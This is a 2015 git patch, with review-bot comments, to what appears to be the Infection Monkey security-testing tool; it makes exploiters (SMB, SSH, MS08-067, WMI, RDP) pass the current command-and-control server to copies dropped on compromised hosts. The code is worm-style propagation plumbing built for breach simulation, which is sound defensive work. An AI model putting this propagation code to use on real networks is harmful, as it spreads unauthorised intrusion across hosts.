From 3522e6e02d3e18aa89eb5b62a4456f38152548f0 Mon Sep 17 00:00:00 2001
From: urihershgc
Date: Thu, 3 Dec 2015 16:38:50 +0200
Subject: [PATCH] GC-4600: monkey is propagating current C&C server
---
 chaos_monkey/exploit/rdpgrinder.py | 4 ++--
 chaos_monkey/exploit/smbexec.py | 2 ++
 chaos_monkey/exploit/sshexec.py | 2 ++
 chaos_monkey/exploit/win_ms08_067.py | 2 ++
 chaos_monkey/exploit/wmiexec.py | 2 ++
 chaos_monkey/model/host.py | 4 ++++
 chaos_monkey/transport/http.py | 3 ---
 7 files changed, 14 insertions(+), 5 deletions(-)
diff --git a/chaos_monkey/exploit/rdpgrinder.py b/chaos_monkey/exploit/rdpgrinder.py
index 5793c17ee..6535b4789 100644
--- a/chaos_monkey/exploit/rdpgrinder.py
+++ b/chaos_monkey/exploit/rdpgrinder.py
@@ -255,9 +255,9 @@ class RdpExploiter(HostExploiter):
 return False
 if self._config.rdp_use_vbs_download:
- command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
+ command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
 else:
- command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
+ command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
 passwords = list(self._config.psexec_passwords[:])
 known_password = host.get_credentials(self._config.psexec_user)
diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py
index 92090a61b..a84280aeb 100644
--- a/chaos_monkey/exploit/smbexec.py
+++ b/chaos_monkey/exploit/smbexec.py
@@ -105,6 +105,8 @@ class SmbExploiter(HostExploiter):
 if host.default_tunnel:
 cmdline += " -t " + host.default_tunnel
+ if host.default_server:
+ cmdline += " -s " + host.default_server
 for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
 rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
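Review bot: The new `cmdline += " -s " + host.default_server` splices `default_server` into the remote command line with no quoting and no format check, so a value containing whitespace or quote characters would either break the argument list or be interpreted by the remote command interpreter; the identical two lines are added in sshexec.py, win_ms08_067.py and wmiexec.py. The value appears to come from the monkey's own configuration rather than from the target, so the realistic failure is a malformed address, but a single check of the expected host[:port] shape before the `+=` (or once, where `default_server` is assigned) would cover all four sites. This patch also does not touch the argument parser of the spawned monkey; presumably `-s` is already accepted alongside `-t`, which is worth confirming since an unrecognised flag would make every propagated instance fail to start. The enclosing exploit method starts and ends outside the hunk.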
diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py
index 3adfb4e43..59f5369db 100644
--- a/chaos_monkey/exploit/sshexec.py
+++ b/chaos_monkey/exploit/sshexec.py
@@ -119,6 +119,8 @@ class SSHExploiter(HostExploiter):
 cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
 if host.default_tunnel:
 cmdline += " -t " + host.default_tunnel
+ if host.default_server:
+ cmdline += " -s " + host.default_server
 cmdline += "&"
 ssh.exec_command(cmdline)
diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py
index 77454c518..64ed056dd 100644
--- a/chaos_monkey/exploit/win_ms08_067.py
+++ b/chaos_monkey/exploit/win_ms08_067.py
@@ -251,6 +251,8 @@ class Ms08_067_Exploiter(HostExploiter):
 if host.default_tunnel:
 cmdline += " -t " + host.default_tunnel
+ if host.default_server:
+ cmdline += " -s " + host.default_server
 try:
 sock.send("start %s\r\n" % (cmdline, ))
diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py
index cd316480a..0276128df 100644
--- a/chaos_monkey/exploit/wmiexec.py
+++ b/chaos_monkey/exploit/wmiexec.py
@@ -86,6 +86,8 @@ class WmiExploiter(HostExploiter):
 if host.default_tunnel:
 cmdline += " -t " + host.default_tunnel
+ if host.default_server:
+ cmdline += " -s " + host.default_server
 # execute the remote monkey
 result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
diff --git a/chaos_monkey/model/host.py b/chaos_monkey/model/host.py
index efe12d7cf..50e08751f 100644
--- a/chaos_monkey/model/host.py
+++ b/chaos_monkey/model/host.py
@@ -9,6 +9,7 @@ class VictimHost(object):
 self.services = {}
 self.monkey_exe = None
 self.default_tunnel = None
+ self.default_server = None
 def as_dict(self):
 return self.__dict__
@@ -36,3 +37,6 @@ class VictimHost(object):
 def get_credentials(self, username):
 return self.cred.get(username.lower(), None)
+
+ def set_default_server(self, default_server):
+ self.default_server = default_server
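Review bot: `set_default_server` is a bare assignment wrapper that nothing in this patch calls, while the sibling `default_tunnel` attribute in the first host.py hunk is evidently set by direct attribute access, so the new setter is either dead code or the one natural place for a check; either drop it for consistency or make it the single validation point that rejects a value which is not a plain host[:port] string before storing it. Nothing in the diff assigns `default_server` either, so as shipped the `-s` branches added to the exploiters only run if some caller outside this patch populates it — presumably the scanner or main loop does, but that should be confirmed. Note also that `as_dict` returns `self.__dict__` unchanged, so the new attribute is included in whatever that dict is sent to; if that is intended, a one-line comment on the attribute such as `# C&C address handed to monkeys spawned on this host via -s` would document the round trip. The `VictimHost` class body continues outside both hunks.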
diff --git a/chaos_monkey/transport/http.py b/chaos_monkey/transport/http.py
index e7ae71f7b..6f10c1811 100644
--- a/chaos_monkey/transport/http.py
+++ b/chaos_monkey/transport/http.py
@@ -112,13 +112,10 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 # just provide a tunnel, transfer the data with no modification
 req = self
 reqbody = None
- import pdb
- pdb.set_trace()
 req.path = "https://%s/" % req.path.replace(':443', '')
 u = urlsplit(req.path)
 address = (u.hostname, u.port or 443)
- uri = u
 try:
 conn = socket.create_connection(address)
 except socket.error: